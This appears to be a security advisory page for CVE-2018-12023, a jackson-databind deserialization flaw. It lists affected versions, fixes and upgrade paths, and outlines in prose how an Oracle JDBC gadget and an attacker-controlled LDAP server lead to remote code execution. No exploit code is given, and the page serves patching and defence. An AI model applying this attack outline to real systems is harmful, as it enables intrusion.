CVE-2018-12023
Deserialization vulnerability in jackson-databind (Maven)
What is CVE-2018-12023 About?
This vulnerability is an Insecure Deserialization issue in FasterXML jackson-databind when Default Typing is enabled and Oracle JDBC is in the classpath. It allows for remote code execution by leveraging an attacker-controlled LDAP service. Exploitation requires providing a malicious payload that triggers deserialization.
Affected Software
- com.fasterxml.jackson.core:jackson-databind
- >2.7.0, <2.7.9.4
- >2.9.0, <2.9.6
- >2.8.0, <2.8.11.2
Technical Details
The vulnerability exists in FasterXML jackson-databind if Default Typing is enabled (either globally or for a specific property) and the Oracle JDBC driver JAR is present in the classpath. An attacker can exploit this by controlling an LDAP service and crafting a JSON payload that, when deserialized by jackson-databind, references a class from the Oracle JDBC driver that can be used as a deserialization gadget. This gadget, when instantiated, will then attempt to connect to the attacker's LDAP server to load further malicious classes, ultimately leading to arbitrary code execution on the target system.
What is the Impact of CVE-2018-12023?
Successful exploitation may allow attackers to execute arbitrary code, gain full control of the affected system, compromise sensitive data, and disrupt service availability.
What is the Exploitability of CVE-2018-12023?
Exploitation requires specific conditions: Default Typing must be enabled in jackson-databind, the Oracle JDBC JAR must be in the classpath, and the attacker must be able to control an LDAP service to deliver a malicious payload. The complexity is high, requiring detailed knowledge of Java deserialization vulnerabilities and gadget chains. No direct authentication is bypassed, but the attack flow might originate from an authenticated user feature that processes untrusted JSON. This is primarily a remote exploitation scenario, assuming the attacker can provide the malicious JSON input and has network access to the target. The significant prerequisites make exploitation more challenging.
What are the Known Public Exploits?
| PoC Author | Link | Commentary |
|---|---|---|
| No known exploits | ||
What are the Available Fixes for CVE-2018-12023?
About the Fix from Resolved Security
This patch adds specific potentially dangerous classes to the blacklist in Jackson's SubTypeValidator, preventing them from being deserialized. It mitigates CVE-2018-12023 by blocking deserialization of classes that could initiate arbitrary network connections (such as LDAP or JDBC), which attackers could exploit for remote code execution or data exfiltration.
Available Upgrade Options
- com.fasterxml.jackson.core:jackson-databind
- >2.7.0, <2.7.9.4 → Upgrade to 2.7.9.4
- com.fasterxml.jackson.core:jackson-databind
- >2.8.0, <2.8.11.2 → Upgrade to 2.8.11.2
- com.fasterxml.jackson.core:jackson-databind
- >2.9.0, <2.9.6 → Upgrade to 2.9.6
Struggling with dependency upgrades?
See how Resolved Security's drop-in replacements make it simple.
Book a demoAdditional Resources
- https://www.oracle.com/security-alerts/cpuoct2020.html
- https://www.oracle.com/security-alerts/cpuapr2020.html
- https://access.redhat.com/errata/RHSA-2019:1822
- https://access.redhat.com/errata/RHSA-2019:1140
- https://lists.apache.org/thread.html/7fcf88aff0d1deaa5c3c7be8d58c05ad7ad5da94b59065d8e7c50c5d@%3Cissues.lucene.apache.org%3E
- https://access.redhat.com/errata/RHSA-2019:4037
- https://access.redhat.com/errata/RHSA-2019:3892
- https://www.oracle.com/security-alerts/cpujul2020.html
- https://www.blackhat.com/docs/us-16/materials/us-16-Munoz-A-Journey-From-JNDI-LDAP-Manipulation-To-RCE.pdf
- https://access.redhat.com/errata/RHSA-2019:0782
What are Similar Vulnerabilities to CVE-2018-12023?
Similar Vulnerabilities: CVE-2017-7525 , CVE-2017-15095 , CVE-2018-7489 , CVE-2019-12384 , CVE-2020-2564
